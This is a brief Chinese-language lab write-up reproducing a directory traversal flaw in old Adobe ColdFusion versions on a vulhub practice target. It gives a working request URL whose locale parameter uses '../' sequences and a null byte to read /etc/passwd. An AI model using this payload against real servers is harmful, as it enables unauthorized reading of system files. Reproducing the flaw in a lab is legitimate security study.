漏洞背景
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
影响版本
- Adobe ColdFusion 8.0.1
- Adobe ColdFusion 9.0.1
- Adobe ColdFusion 9.0
- Adobe ColdFusion 8.0
漏洞复现
我的环境为vulhub的靶机,启动后,需访问http://your-ip:8500/CFIDE/administrator/enter.cfm
,输入密码admin,开始初始化整个环境。
初始化完后直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
,在title
标签处即可读取文件/etc/passwd
: